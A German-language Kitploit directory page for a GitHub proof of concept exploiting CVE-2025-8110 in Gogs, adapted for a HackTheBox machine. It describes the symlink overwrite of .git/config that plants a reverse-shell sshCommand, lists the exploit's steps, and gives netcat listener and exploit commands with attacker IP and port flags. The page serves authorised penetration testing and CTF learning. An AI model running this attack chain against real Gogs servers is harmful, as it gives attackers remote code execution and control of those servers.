Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8110 — Gogs-Dienst-Exploit und Root-Benutzer erhalten | Kitploit
Tools/GitHubGitHub/ixzodiak/cve-2025-8110
ExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingRemote-Access-Tool
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Gogs-Dienst-Exploit und Root-Benutzer erhalten

Repository anzeigen
49vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

Haftungsausschluss: Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests gedacht. Verwenden Sie es nur gegen Systeme, für die Sie eine ausdrückliche Genehmigung zum Testen haben.


Dies ist eine modifizierte Version von zAbuQasem/gogs-CVE-2025-8110, die an die Silentium-Maschine auf HackTheBox angepasst wurde. Der ursprüngliche PoC erforderte Anpassungen, um Silentiums spezifische Gogs-Konfiguration und Authentifizierungsablauf zu bewältigen.


Die Sicherheitslücke

CVE-2025-8110 ist eine Remote-Codeausführungs-Schwachstelle in Gogs, einem selbst gehosteten Git-Dienst.

Der Datei-Update-API-Endpunkt von Gogs (PUT /api/v1/repos/.../contents/<file>) validiert nicht, ob die Zieldatei ein Symlink ist. Ein authentifizierter Angreifer kann einen Symlink in ein Repository pushen, der auf .git/config zeigt, und dann die API verwenden, um ihn mit einer bösartigen Nutzlast zu überschreiben. Die Nutzlast injiziert einen benutzerdefinierten sshCommand in die Git-Konfiguration, den Gogs serverseitig ausführt, wenn es das nächste Mal eine SSH-Operation auf diesem Repository durchführt, was zu einer Remote-Codeausführung führt.


Was der PoC macht

Tool herunterladen
  1. Authentifiziert sich bei Gogs und extrahiert ein CSRF-Token von der Anmeldeseite.
  2. Generiert ein Gogs-API-Token über die Benutzereinstellungsseite.
  3. Erstellt ein neues Repository über die API mit aktiviertem SSH.
  4. Klont das Repository lokal, platziert einen Symlink (malicious_link -> .git/config) und pusht ihn.
  5. Ruft die Datei-Update-API auf dem Symlink auf und schreibt eine bösartige .git/config, die sshCommand = <reverse shell> enthält.
  6. Gogs folgt dem Symlink und überschreibt sein eigenes .git/config, was die Shell bei der nächsten SSH-Operation auslöst.

Verwendung

Abhängigkeiten installieren:

root@kitploit:~
pip install -r requirements.txt

Einen Listener starten:

root@kitploit:~
nc -lvnp <PORT>

Den Exploit ausführen:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

Optional — über Burp Suite leiten:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
FlagBeschreibung
-uGogs-Basis-URL
-lhIhre Angreifer-IP (Reverse-Shell-Host)
-lpIhr Listener-Port
-unIhr registrierter Gogs-Benutzername
-pwIhr Gogs-Passwort
-x(Optional) Verkehr über Burp auf localhost:8080 leiten